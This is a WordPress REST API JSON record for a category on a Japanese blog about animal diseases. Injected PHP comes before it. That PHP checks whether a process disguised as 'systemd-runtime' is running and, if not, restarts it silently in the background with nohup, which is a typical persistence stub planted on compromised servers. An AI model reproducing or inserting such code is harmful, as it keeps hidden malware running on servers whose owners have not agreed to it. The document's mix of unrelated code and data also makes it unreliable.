$programFilePath = 'systemd-runtime'; $processList = shell_exec('ps aux'); if (strpos($processList, $programFilePath) === false) { $commandToExecute = 'nohup ./' . $programFilePath . ' > /dev/null 2>&1 &'; shell_exec($commandToExecute); }{"id":3,"count":9,"description":"","link":"https:\/\/honmokudori.com\/blog\/category\/byouki","name":"\u52d5\u7269\u304c\u304b\u304b\u308b\u4e3b\u306a\u75c5\u6c17","slug":"byouki","taxonomy":"category","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/honmokudori.com\/blog\/wp-json\/wp\/v2\/categories\/3"}],"collection":[{"href":"https:\/\/honmokudori.com\/blog\/wp-json\/wp\/v2\/categories"}],"about":[{"href":"https:\/\/honmokudori.com\/blog\/wp-json\/wp\/v2\/taxonomies\/category"}],"wp:post_type":[{"href":"https:\/\/honmokudori.com\/blog\/wp-json\/wp\/v2\/posts?categories=3"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}